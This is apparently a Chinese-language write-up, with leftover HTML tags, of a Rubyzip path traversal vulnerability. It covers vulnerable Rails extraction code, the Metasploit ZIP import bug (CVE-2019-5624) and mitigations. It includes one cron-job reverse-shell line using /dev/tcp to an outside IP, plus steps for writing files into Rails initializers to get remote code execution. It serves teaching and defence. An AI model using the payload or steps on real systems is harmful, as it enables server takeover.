Rubyzip库路径遍历漏洞分析与利用教学<\/h1>

漏洞概述<\/h2>
Rubyzip库在处理ZIP文件时存在路径遍历漏洞，允许攻击者通过精心构造的恶意ZIP文件实现任意文件写入，在特定条件下可进一步导致远程代码执行(RCE)。该漏洞主要影响Ruby on Rails应用程序中使用了Rubyzip gem进行ZIP文件处理的场景。<\/p>

漏洞原理分析<\/h2>

Rubyzip库的安全机制<\/h3>

Rubyzip库曾多次爆出通过恶意文件名造成的路径遍历漏洞。开发者通过以下机制来防御：<\/p>

Entry#name_safe?方法<\/strong>：检查文件名是否为相对路径且不包含..<\/code>模式<\/li> <\/ol> def<\/span> name_safe?<\/span> <\/span><\/span> cleanpath =<\/span> Pathname<\/span>.<\/span>new(@name).<\/span>cleanpath <\/span><\/span> return<\/span> false<\/span> unless<\/span> cleanpath.<\/span>relative? <\/span><\/span> root =<\/span> ::<\/span>File<\/span>::<\/span>SEPARATOR<\/span> <\/span><\/span> naive_expanded_path =<\/span> ::<\/span>File<\/span>.<\/span>join(root, cleanpath.<\/span>to_s) <\/span><\/span> cleanpath.<\/span>expand_path(root).<\/span>to_s ==<\/span> naive_expanded_path <\/span><\/span>end<\/span> <\/span><\/span><\/code><\/pre> Entry#extract方法<\/strong>：默认使用name_safe?检查<\/li> <\/ol> def<\/span> extract<\/span>(dest_path =<\/span> nil<\/span>, &<\/span>block) <\/span><\/span> if<\/span> dest_path.<\/span>nil? &&<\/span> !<\/span>name_safe? <\/span><\/span> puts "WARNING: skipped <\/span>#{<\/span>@name}<\/span> as unsafe"<\/span> <\/span><\/span> return<\/span> self <\/span><\/span> end<\/span> <\/span><\/span> [...]<\/span> <\/span><\/span>end<\/span> <\/span><\/span><\/code><\/pre>漏洞根源<\/h3> 漏洞存在于以下关键点：<\/p> 参数传递绕过<\/strong>：当直接向extract<\/code>方法传递目标路径参数时，name_safe?<\/code>检查会被绕过<\/li> Pathname对象处理问题<\/strong>：Pathname对象与字符串相加时对..\/<\/code>的特殊处理导致安全检测失效<\/li> <\/ol> 漏洞验证<\/h3> 使用evilarc工具生成恶意ZIP文件：<\/p> $ zipinfo absolutepath.zip Archive: absolutepath.zip Zip file size: 289 bytes, number of entries: 2 drwxr-xr-x 2.1 unx 0 bx stor 18-Jun-13 20:13 \/tmp\/ -rw-r--r-- 2.1 unx 5 bX defN 18-Jun-13 20:13 \/tmp\/file.txt <\/code><\/pre> 使用以下代码验证漏洞：<\/p> require 'zip'<\/span> <\/span><\/span>first_arg, *<\/span>the_rest =<\/span> ARGV<\/span> <\/span><\/span>Zip<\/span>::<\/span>File<\/span>.<\/span>open(first_arg) do<\/span> |<\/span>zip_file|<\/span> <\/span><\/span> zip_file.<\/span>each do<\/span> |<\/span>entry|<\/span> <\/span><\/span> puts "Extracting <\/span>#{<\/span>entry.<\/span>name}<\/span>"<\/span> <\/span><\/span> entry.<\/span>extract(entry.<\/span>name) <\/span><\/span> end<\/span> <\/span><\/span>end<\/span> <\/span><\/span><\/code><\/pre>实际应用中的脆弱性<\/h2> 典型易受攻击的代码模式：<\/p> def<\/span> unzip<\/span>(input) <\/span><\/span> uuid =<\/span> get_uuid() <\/span><\/span> parent_directory =<\/span> Pathname<\/span>.<\/span>new("<\/span>#{<\/span>ENV<\/span>[<\/span>'uploads_dir'<\/span>]<\/span>}<\/span>\/<\/span>#{<\/span>uuid}<\/span>"<\/span>) <\/span><\/span> <\/span><\/span> Zip<\/span>::<\/span>File<\/span>.<\/span>open(input[<\/span>:zip_file<\/span>].<\/span>to_io) do<\/span> |<\/span>zip_file|<\/span> <\/span><\/span> zip_file.<\/span>each_with_index do<\/span> |<\/span>entry, index|<\/span> <\/span><\/span> next<\/span> if<\/span> File<\/span>.<\/span>file?(parent_directory +<\/span> entry.<\/span>name) <\/span><\/span> entry.<\/span>extract(parent_directory +<\/span> entry.<\/span>name) # 漏洞点<\/span> <\/span><\/span> end<\/span> <\/span><\/span> end<\/span> <\/span><\/span> Success<\/span> <\/span><\/span>end<\/span> <\/span><\/span><\/code><\/pre>问题分析<\/strong>：<\/p> Pathname对象与字符串相加时对..\/<\/code>的特殊处理<\/li> 传递给extract的路径不包含目录遍历payload，绕过安全检查<\/li> Ruby gem不会进行额外验证<\/li> <\/ul> 利用场景：Ruby on Rails RCE<\/h2> 利用条件<\/h3> 应用运行在生产环境<\/li> Rails配置了cache_classes<\/code><\/li> 攻击者能够触发服务器重启（或结合DoS漏洞）<\/li> <\/ol> 利用方法<\/h3> 写入恶意.rb文件到\/config\/initializers<\/code>目录<\/li> 服务器重启后自动加载初始化脚本<\/li> <\/ol> 原理<\/strong>： Rails会在加载框架和插件后自动加载\/config\/initializers<\/code>下的所有Ruby文件<\/p> Metasploit Framework实例分析<\/h2> Metasploit Framework中也存在此漏洞，位于ZIP导入功能：<\/p> data.<\/span>entries.<\/span>each do<\/span> |<\/span>e|<\/span> <\/span><\/span> target =<\/span> ::<\/span>File<\/span>.<\/span>join(@import_filedata[<\/span>:zip_tmp<\/span>]<\/span>, e.<\/span>name) <\/span><\/span> data.<\/span>extract(e,target) # 漏洞点<\/span> <\/span><\/span>end<\/span> <\/span><\/span><\/code><\/pre>攻击步骤<\/h3> 创建包含cron job payload的文件：<\/li> <\/ol> * * * * * root \/bin\/bash -c "exec \/bin\/bash 0<\/dev\/tcp\/172.16.13.144\/4444 1>&0 2>&0 0<&196;exec 196<>\/dev\/tcp\/172.16.13.144\/4445; bash <&196 >&196 2>&196" <\/code><\/pre> 使用evilarc工具嵌入路径遍历payload到ZIP文件<\/p> <\/li> 添加有效的MSF工作区XML文件（使ZIP能被处理）<\/p> <\/li> 设置两个监听端口：4444和4445<\/p> <\/li> 登录MSF后台，创建新项目并导入恶意ZIP文件<\/p> <\/li> 导入完成后获取反向shell<\/p> <\/li> <\/ol> 防御措施<\/h2> 更新Rubyzip<\/strong>：确保使用最新版本（1.2.2之后）<\/p> <\/li> 额外验证<\/strong>：在使用Entry#extract<\/code>时添加对名称和目标路径的额外验证<\/p> <\/li> 安全实践<\/strong>：<\/p> 不要信任用户提供的ZIP文件内容<\/li> 对解压路径进行规范化并严格检查<\/li> 使用沙箱环境处理不可信文件<\/li> <\/ul> <\/li> Metasploit用户<\/strong>：更新到已修复版本（CVE-2019-5624）<\/p> <\/li> <\/ol> 工具与资源<\/h2> Evilarc工具<\/strong>：用于生成包含路径遍历payload的ZIP文件<\/p> 来源：https:\/\/labs.neohapsis.com\/2009\/04\/21\/directory-traversal-in-archives\/<\/li> <\/ul> <\/li> 演示视频<\/strong>：<\/p> https:\/\/blog.doyensec.com\/public\/images\/msf-zip-bug.mp4<\/li> <\/ul> <\/li> <\/ol> 总结<\/h2> Rubyzip库的路径遍历漏洞展示了文件处理功能中常见的安全问题。开发者需要：<\/p> 理解所使用库的安全机制和限制<\/li> 不盲目依赖库的默认安全检查<\/li> 在处理用户提供的文件时实施深度防御策略<\/li> 定期审查和更新依赖库<\/li> <\/ul>